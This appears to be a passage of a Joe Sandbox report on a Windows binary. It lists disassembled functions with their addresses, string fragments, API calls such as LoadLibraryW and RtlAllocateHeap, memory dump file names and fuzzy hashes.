gFW, xrefs: 00007FF7A0A10CA8
gFW, xrefs: 00007FF7A0A11341
dT, xrefs: 00007FF7A0A10C8F
dT, xrefs: 00007FF7A0A10A92
gFW, xrefs: 00007FF7A0A10806
dT, xrefs: 00007FF7A0A10841

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: gFW$gFW$gFW$dT$dT$dT
API String ID: 0-1908915228
Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction ID: ad6b54227ae17d71ef06b520cbe1d4614970af66bc598050c1f2a592488f88ca
Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction Fuzzy Hash: 0842D033B0EBC68ADAB49705F440EBAB695E7987D0F500536DE8D07BA4EE7CE4409B50

Function 00007FF7A09F3030 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"Yba, xrefs: 00007FF7A09F3301
"Yba, xrefs: 00007FF7A09F33A7
JC<., xrefs: 00007FF7A09F30A1
fkB2, xrefs: 00007FF7A09F308B
KC<., xrefs: 00007FF7A09F32B3
gkB2, xrefs: 00007FF7A09F34F7
KC<., xrefs: 00007FF7A09F30AC
gkB2, xrefs: 00007FF7A09F31CB

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
API String ID: 0-2770720463
Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction ID: 8f48bb0accd432d65e82ea89e449ff8e743aabe913931ea13ddf9b1a2a64ac73
Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction Fuzzy Hash: 34B10A23B0F74799E9789619A08033EE254EB44790FA58937E98DC37B4CE2DF4904756

Function 00007FF7A0A0FF60 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-YV, xrefs: 00007FF7A0A10055
-YV, xrefs: 00007FF7A0A100D0
%<L,, xrefs: 00007FF7A0A10147
%<L,, xrefs: 00007FF7A0A103E2
-YV, xrefs: 00007FF7A0A101C7

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: %<L,$%<L,$-YV$-YV$-YV
API String ID: 0-1602977039
Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction ID: d8318bd5e61cd6cde7abb23424f1e1347a210edfdd1efaac2f7f08d06ff7d3b1
Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction Fuzzy Hash: A3D11A23B16B57C5FB609F399480ABD72A0BB18788F514932EE4DD3B64EF38E5918350

Function 00007FF7A0A15870 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+I}, xrefs: 00007FF7A0A15996
+I}, xrefs: 00007FF7A0A15C10

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: +I}$+I}
API String ID: 0-3898140586
Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction ID: e6a15bd6e67c4e6007d91ae6a50bc0a5adea9c5b3c367c163462085b2eef30a3
Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction Fuzzy Hash: 95810827E1E903C7E974A63564C093DE6909F85350FE91936E90EC77F0EA2DF8415B21

Function 00007FF7A09A4970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.4[, xrefs: 00007FF7A09A4AAB
.4[, xrefs: 00007FF7A09A4B9B

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: .4[$ .4[
API String ID: 0-1397926279
Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction ID: 6d4852e12592e7682a323ffc62e68caac35a894d0ab05fb2f6efd2f3f63f07d5
Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction Fuzzy Hash: 1551E812A1BB8985EA219B39A4413A9E3A0BFD8794F544731ED8D56771EF3CF1D28700

Function 00007FF7A09B88F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FF7A09B9314

Strings

H]c, xrefs: 00007FF7A09B92E6

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: LibraryLoad
String ID: H]c
API String ID: 1029625771-2876529112
Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction ID: 410bd1b2dba4778062a1e24d724a3be0aa10b9f178a75f9715d91ae62f83f72f
Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction Fuzzy Hash: 4751983261E68781DE749658E0943BFA390EB89B70F910A32D6ADC77F4CE2CF4408752

Function 00007FF7A09F2BA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

phV, xrefs: 00007FF7A09F2C17

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: phV
API String ID: 0-1350728776
Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction ID: 0cfed8ea75f9ec2286976bd72ef4a70e04c5e12f5f24d716eef3e6198e954ccc
Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction Fuzzy Hash: AC41C433A0E54389E9701619948133D9690AB557B4FA60F72EEBDC77F4CA2CF8D04362

Function 00007FF7A09A6A50 Relevance: 3.3, APIs: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF7A09A6B1D

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction ID: 21b860acf92f3e82de4e54abf44a597ff6e73f15bf0c1a94711e7d31b7b41152
Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction Fuzzy Hash: C1C14A26B0E253C6E6386E28649023DE290DF50350FA2493AF5DF97BF4CE2CF8624711

Function 00007FF7A0A15680 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction ID: 4d8b1433a7e7a224d4ad6b273177f55d9ee0d7401b7c9f71f892e42149522e49
Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction Fuzzy Hash: E1119622D1DF42C2D6605E15A88153EB291F7893A4FD60931E9DDC3374DE2CE5504750

Function 00007FF7A0A113D0 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDlgButtonChecked.USER32 ref: 00007FF7A0A113FF

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: ButtonChecked
String ID:
API String ID: 1719414920-0
Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction ID: cf9f65139c6f31abf858d3f6f1a198ea0483ebaa69be35fb92449007f9e5f97e
Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction Fuzzy Hash: BDF02263A0D28144EA302621F50067A9B20DB98BF4F980870ED8D47BA8EA1DE6818700

Function 00007FF7A0A15750 Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,00007FF7A09C432B), ref: 00007FF7A0A157A5

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction ID: 8594dde8c6b446c455383a24c9c61b17db4d64e9c7e6a1333a3adae414a61cb1
Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction Fuzzy Hash: 1DF0622662AF45C5DAA89B15F88022DB3A4F7C8790F541425FA8E83B78DF3DD4504700

Function 00007FF7A0A15620 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDeleteBoundaryDescriptor.NTDLL(1063196CE2D18368,00007FF7A09AB179), ref: 00007FF7A0A1565F

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
Instruction ID: d38e9983ef6c46124f0c630336d3191dce2af7016dc562ed474ca99de284ecff
Opcode Fuzzy Hash: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
Instruction Fuzzy Hash: 9CE0E522E0DB46C5DA609726F440439A391BB8CB90FAD4631DD9D83730EE2CE6824B00

Function 00007FF7A0A15C40 Relevance: 1.5, APIs: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7A0A15C84

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction ID: 5f5587aec068f72640efc28785d8a8bc108e6000da50fbbba1f3646ef9296c1c
Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
Instruction Fuzzy Hash: 79F0E526A19F42C5DABC9B11A8D0239A7A1FB88740F800576EE4F43B74DE3CE4008750

Function 00007FF7A09F2F40 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE ref: 00007FF7A09F2F63

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction ID: 72deb96d44f345c805d313bbd9ead090462e97b44e1ce9a5f9b1f3d5692162a2
Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
Instruction Fuzzy Hash: 1DE0D80791E293C6A53812252050079AB715F96354FA60B35E6AE51BF0C90DEA575B14

Non-executed Functions

Function 00007FF7A09C29E0 Relevance: 60.3, Strings: 44, Instructions: 5277COMMON

Download Yara Rule

Strings

pMkl, xrefs: 00007FF7A09C95C1
pMkl, xrefs: 00007FF7A09C41D4
M!l, xrefs: 00007FF7A09C42CD
DKv, xrefs: 00007FF7A09C9786
pS, xrefs: 00007FF7A09C80A7
pMkl, xrefs: 00007FF7A09C6C3C
- D, xrefs: 00007FF7A09C2DD6
pMkl, xrefs: 00007FF7A09C50B3
pMkl, xrefs: 00007FF7A09C892F
M!l, xrefs: 00007FF7A09C73FD
pMkl, xrefs: 00007FF7A09C6B54
L,\l, xrefs: 00007FF7A09C42D9
H>A, xrefs: 00007FF7A09C56BD
, D, xrefs: 00007FF7A09C2DBE
[@b, xrefs: 00007FF7A09C5B49
^+8, xrefs: 00007FF7A09C2D20
CKv, xrefs: 00007FF7A09C452C
a`P, xrefs: 00007FF7A09C30D0
H>A, xrefs: 00007FF7A09C2DE2
oMkl, xrefs: 00007FF7A09C42C1
pS, xrefs: 00007FF7A09C69FD
.]c, xrefs: 00007FF7A09C5B55
^+8, xrefs: 00007FF7A09C3B3C
-Mp, xrefs: 00007FF7A09C3A1E
pMkl, xrefs: 00007FF7A09C944D
Vp\*, xrefs: 00007FF7A09C57B8
DKv, xrefs: 00007FF7A09C59B0
Z@b, xrefs: 00007FF7A09C2ED9
3{, xrefs: 00007FF7A09C5B11
b`P, xrefs: 00007FF7A09C5411
[@b, xrefs: 00007FF7A09C8261
L,\l, xrefs: 00007FF7A09C9634
^+8, xrefs: 00007FF7A09C3B24
- D, xrefs: 00007FF7A09C348E
L!l, xrefs: 00007FF7A09C35DB
Vp\*, xrefs: 00007FF7A09C8A52
pMkl, xrefs: 00007FF7A09C5CD4
-Mp, xrefs: 00007FF7A09C79A4
.]c, xrefs: 00007FF7A09C7928
pMkl, xrefs: 00007FF7A09C7211
pMkl, xrefs: 00007FF7A09C60A8
pMkl, xrefs: 00007FF7A09C9712
b`P, xrefs: 00007FF7A09C30E8
M!l, xrefs: 00007FF7A09C88F3

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: , D$- D$- D$-Mp$-Mp$.]c$.]c$3{$CKv$DKv$DKv$H>A$H>A$L,\l$L,\l$L!l$M!l$M!l$M!l$Vp\*$Vp\*$Z@b$[@b$[@b$a`P$b`P$b`P$oMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pS$pS$^+8$^+8$^+8
API String ID: 0-3060701247
Opcode ID: d0c055135f0365669ed6390500889401e5a9bc649a1eb788d5c4ea856c5a02a7
Instruction ID: d91afab0ec0c693bc3afc5eeee505cd550305e8102b8302a8b6eadcebdc732f5
Opcode Fuzzy Hash: d0c055135f0365669ed6390500889401e5a9bc649a1eb788d5c4ea856c5a02a7
Instruction Fuzzy Hash: 45B3CC36E097C7CEDB785F2588A03FD7391EB45744F91493AC64E4BBA4CE28BA408B51

Function 00007FF7A09DB6B0 Relevance: 48.0, Strings: 35, Instructions: 4292COMMON

Download Yara Rule

Strings

+CB, xrefs: 00007FF7A09DC3E3
XdU, xrefs: 00007FF7A09DD64B
~{, xrefs: 00007FF7A09E00F2
zB/, xrefs: 00007FF7A09DE8EB
()m, xrefs: 00007FF7A09DDE1D
*OqW, xrefs: 00007FF7A09DD160
xYjl, xrefs: 00007FF7A09DCA47
zB/, xrefs: 00007FF7A09DC3DD
I"l[, xrefs: 00007FF7A09DC428
Pw3, xrefs: 00007FF7A09DF495
2>", xrefs: 00007FF7A09DC970
J"l[, xrefs: 00007FF7A09DD330
f@~, xrefs: 00007FF7A09DE83D
zB/, xrefs: 00007FF7A09DCAF0
o,9T, xrefs: 00007FF7A09DD635
~{, xrefs: 00007FF7A09DC924
)OqW, xrefs: 00007FF7A09DCEFC
e@~, xrefs: 00007FF7A09DC8DA
2>", xrefs: 00007FF7A09DE196
XdU, xrefs: 00007FF7A09DECD5
+CB, xrefs: 00007FF7A09DDFAC
6j]U, xrefs: 00007FF7A09DD640
J"l[, xrefs: 00007FF7A09DD45C
*OqW, xrefs: 00007FF7A09DCF07
xYjl, xrefs: 00007FF7A09DEC00
n^ m, xrefs: 00007FF7A09E0F4C
n,9T, xrefs: 00007FF7A09DC706
f@~, xrefs: 00007FF7A09DDC3F
n^ m, xrefs: 00007FF7A09E0175
()m, xrefs: 00007FF7A09E0E85
6j]U, xrefs: 00007FF7A09DE52A
~{, xrefs: 00007FF7A09DDC97
o,9T, xrefs: 00007FF7A09DE430
Pw3, xrefs: 00007FF7A09DEB18
Pw3, xrefs: 00007FF7A09DC510

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ~{$2>"$2>"$Pw3$Pw3$Pw3$~{$~{$)OqW$*OqW$*OqW$+CB$+CB$6j]U$6j]U$I"l[$J"l[$J"l[$e@~$f@~$f@~$n,9T$n^ m$n^ m$o,9T$o,9T$xYjl$xYjl$zB/$zB/$zB/$()m$()m$XdU$XdU
API String ID: 0-2338440668
Opcode ID: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
Instruction ID: 26539ee8e2852fd25e71a9f90de82538c6ffd8b8a4314b74ce4c5b0f9bf21e58
Opcode Fuzzy Hash: 6da7570d03c9cdaee5e625def39a03de1a98c453bee8f8427bb1ebcd0885f883
Instruction Fuzzy Hash: 7A93C73664F7C7C6EA749B18A4943BEA391EBC4740FA14936D68DC7BA4DE2CF4408B11

Function 00007FF7A09A1920 Relevance: 39.4, Strings: 30, Instructions: 1904COMMON

Download Yara Rule

Strings

b[`S, xrefs: 00007FF7A09A1D2C
X~wo, xrefs: 00007FF7A09A3C2C
td8, xrefs: 00007FF7A09A1AD0
X~wo, xrefs: 00007FF7A09A24A1
DcW, xrefs: 00007FF7A09A3243
(]u, xrefs: 00007FF7A09A3184
<3RB, xrefs: 00007FF7A09A22C4
7\q , xrefs: 00007FF7A09A1BD2
ud8, xrefs: 00007FF7A09A1CC4
DcW, xrefs: 00007FF7A09A23D9
Wc,, xrefs: 00007FF7A09A1FF2
Nc^m, xrefs: 00007FF7A09A248B
Nc^m, xrefs: 00007FF7A09A235D
k=5, xrefs: 00007FF7A09A257C
G#p, xrefs: 00007FF7A09A2D63
kwEb, xrefs: 00007FF7A09A3C70
8\q , xrefs: 00007FF7A09A19AB
<3RB, xrefs: 00007FF7A09A2DAF
;3RB, xrefs: 00007FF7A09A22B9
G#p, xrefs: 00007FF7A09A1FFD
8\q , xrefs: 00007FF7A09A1BE8
k=5, xrefs: 00007FF7A09A37A0
(]u, xrefs: 00007FF7A09A2B09
Mc^m, xrefs: 00007FF7A09A2480
Wc,, xrefs: 00007FF7A09A3608
']u, xrefs: 00007FF7A09A1B6B
a[`S, xrefs: 00007FF7A09A1D21
b[`S, xrefs: 00007FF7A09A2414
kwEb, xrefs: 00007FF7A09A3DE4
ud8, xrefs: 00007FF7A09A32E5

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ']u$(]u$(]u$7\q $8\q $8\q $;3RB$<3RB$<3RB$G#p$G#p$Mc^m$Nc^m$Nc^m$Wc,$Wc,$X~wo$X~wo$a[`S$b[`S$b[`S$k=5$k=5$kwEb$kwEb$td8$ud8$ud8$DcW$DcW
API String ID: 0-67992731
Opcode ID: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
Instruction ID: 5f2a2d4d94701e2cfc9581dfcfb9e89eb08745ceda9320713be7174c591b5499
Opcode Fuzzy Hash: 84ba4c9e7151121fdfedf0e837e7828cc7c9bd50e2ba62bf12cd27050a02de91
Instruction Fuzzy Hash: 5903FC3AA0E1838AEA749618A09067FE6D0DB95350FA54D36E5CDC77F4CF2CF4528B21

Function 00007FF7A0A18AB0 Relevance: 35.3, APIs: 3, Strings: 16, Instructions: 2093COMMON

Download Yara Rule

Strings

_P", xrefs: 00007FF7A0A19D0D
E_oq, xrefs: 00007FF7A0A1A300
P$, xrefs: 00007FF7A0A1A17D
_P", xrefs: 00007FF7A0A1ABE2
^t.+, xrefs: 00007FF7A0A19037
TKp/, xrefs: 00007FF7A0A1979D
SKp/, xrefs: 00007FF7A0A19791
P$, xrefs: 00007FF7A0A19FAE
^t.+, xrefs: 00007FF7A0A19B69
P$, xrefs: 00007FF7A0A19CD0
|1U, xrefs: 00007FF7A0A19A65
D_oq, xrefs: 00007FF7A0A191DB
TKp/, xrefs: 00007FF7A0A1A82F
|1U, xrefs: 00007FF7A0A1B437
E_oq, xrefs: 00007FF7A0A191E7
P$, xrefs: 00007FF7A0A18FA6

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

